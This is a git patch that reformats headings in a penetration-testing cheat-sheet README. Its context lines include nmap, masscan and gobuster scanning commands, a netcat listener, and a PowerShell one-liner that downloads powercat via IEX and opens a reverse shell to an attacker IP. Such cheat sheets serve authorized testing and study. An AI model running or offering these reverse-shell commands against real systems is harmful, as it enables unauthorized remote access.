From 1cdc1241dc71382e50051219b1dc1c591493d6e1 Mon Sep 17 00:00:00 2001 From: Phil Date: Fri, 24 Dec 2021 13:41:29 +0000 Subject: [PATCH] Formatting --- README.md | 25 ++++++++++++++++++------- 1 file changed, 18 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 5c78b5c..f715673 100644 --- a/README.md +++ b/README.md @@ -30,14 +30,14 @@ -##### Nmap +#### Nmap ``` nmap -sV -sC -oA nmap/basic IP nmap [Scan Type] [Options] {target specification} ``` - +``` * HOST DISCOVERY: - -sL: List Scan - simply list targets to scan - -sn/-sP: Ping Scan - disable port scan @@ -59,20 +59,25 @@ nmap [Scan Type] [Options] {target specification} -v: Increase verbosity level (use -vv or more for greater effect) * MISC: -6: Enable IPv6 scanning -A: Enable OS detection, version detection, script scanning, and traceroute +``` -##### Masscan + +#### Masscan ```bash masscan IP -p 1-65535 --rate 100 -oX masscan.xml ``` -##### Netdiscover + + +#### Netdiscover ```` netdiscover -i ``` -##### DirBuster / GoBuster + +#### DirBuster / GoBuster ```bash ./gobuster -u http://buffered.io/ -w /secondary/wordlists/more-lists/dirb/ -t 10 @@ -91,7 +96,7 @@ netdiscover -i ### Attacking - Reverse Shells -* PHP Reverse Shell +#### PHP Reverse Shell ``` ``` +#### Built-in Tools + | Program | Command | |----------|---------| | Netcat Listen | ncat -vlnp 4444 | @@ -300,7 +307,9 @@ function printit ($string) { | Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html | | Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd | -### Spawning a Shell + + +#### Spawning a Shell To check if the shell is a tty shell, just enter tty command like the following. @@ -339,6 +348,8 @@ fg export TERM=xterm ``` + + ## Stage 3 - Post Exploitation ### Lets Have a Look Around